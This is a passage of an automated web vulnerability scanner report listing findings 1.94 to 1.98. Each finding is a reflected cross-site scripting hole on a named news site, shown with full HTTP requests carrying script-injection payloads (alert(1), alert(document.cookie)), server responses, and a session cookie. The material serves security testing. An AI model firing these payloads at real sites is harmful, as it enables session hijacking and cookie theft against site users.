GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/20112b157"><script>alert(1)</script>b60a879cda8/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:11:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:11:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
ertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/20112b157\"><script>alert(1)</script>b60a879cda8/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home
...[SNIP]...

1.94. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 13]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 13 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1329"><script>alert(1)</script>c2a1dd86290 was submitted in the REST URL parameter 13. This input was echoed as b1329\"><script>alert(1)</script>c2a1dd86290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01b1329"><script>alert(1)</script>c2a1dd86290/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:12:02 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:12:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
document.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01b1329\"><script>alert(1)</script>c2a1dd86290/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/th
...[SNIP]...

1.95. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 14 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7965"><script>alert(1)</script>e192b52f48d was submitted in the REST URL parameter 14. This input was echoed as b7965\"><script>alert(1)</script>e192b52f48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20hrefb7965"><script>alert(1)</script>e192b52f48d=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:13:24 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:13:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20hrefb7965\"><script>alert(1)</script>e192b52f48d=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/t
...[SNIP]...

1.96. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b86c"><script>alert(1)</script>9c6f7d2a56a was submitted in the REST URL parameter 1. This input was echoed as 9b86c\"><script>alert(1)</script>9c6f7d2a56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C9b86c"><script>alert(1)</script>9c6f7d2a56a/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:41:45 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:41:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C9b86c\"><script>alert(1)</script>9c6f7d2a56a/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%2
...[SNIP]...

1.97. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d7a"><script>alert(1)</script>ebcd9b22215 was submitted in the REST URL parameter 2. This input was echoed as 89d7a\"><script>alert(1)</script>ebcd9b22215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b89d7a"><script>alert(1)</script>ebcd9b22215/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:43:36 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:43:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b89d7a\"><script>alert(1)</script>ebcd9b22215/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function
...[SNIP]...

1.98. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b19a"><script>alert(1)</script>5db2c1a0144 was submitted in the REST URL parameter 3. This input was echoed as 5b19a\"><script>alert(1)</script>5db2c1a0144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/20115b19a"><script>alert(1)</script>5db2c1a0144/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:50:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:50:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/20115b19a\"><script>alert(1)</script>5db2c1a0144/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.geti
...[SNIP]...

